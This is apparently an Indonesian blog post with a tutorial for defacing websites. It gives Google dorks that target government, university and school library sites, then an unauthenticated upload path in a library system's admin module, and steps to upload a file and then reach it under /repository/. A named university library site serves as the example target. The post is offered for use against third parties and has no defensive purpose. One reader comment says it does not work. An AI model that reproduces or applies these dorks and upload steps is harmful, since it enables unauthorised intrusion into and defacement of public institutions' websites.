Hae Tamvan, berjumpa lagi dengan mimin. Kali ini mimin akan memberikan tutor Deface poc File Attachment Upload Repository. Langsung saja.
Bahan :
Dork :
- inurl:/admin/modules/bibliography/pop_attach.php
- pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
- pustaka.*.(isi dengan domain yang lu mau :v)
Exploit : /admin/modules/bibliography/pop_attach.php
Langkah-langkah :
- Pertama, kita dorking menggunakan salah satu dork diatas.
- Kedua, pilih salah satu target.
- Ketiga, masukan exploit diatas dibelang site/
contoh
http://library.stikessarimulia.ac.id/
Ditambah exploit menjadi :
http://library.stikessarimulia.ac.id/admin/modules/bibliography/pop_attach.php
Keempat, kita isi namanya dan upload file.
Lalu klik unggah sekarang.
- Kelima, kita panggil filenya, lokasi file : site/repository/yourfile.txt
contoh http://library.stikessarimulia.ac.id/repository/nimo.txt
Sekian dulu, kalo ada yang kurang mengerti bisa ditanyakan.
up ga work
ReplyDelete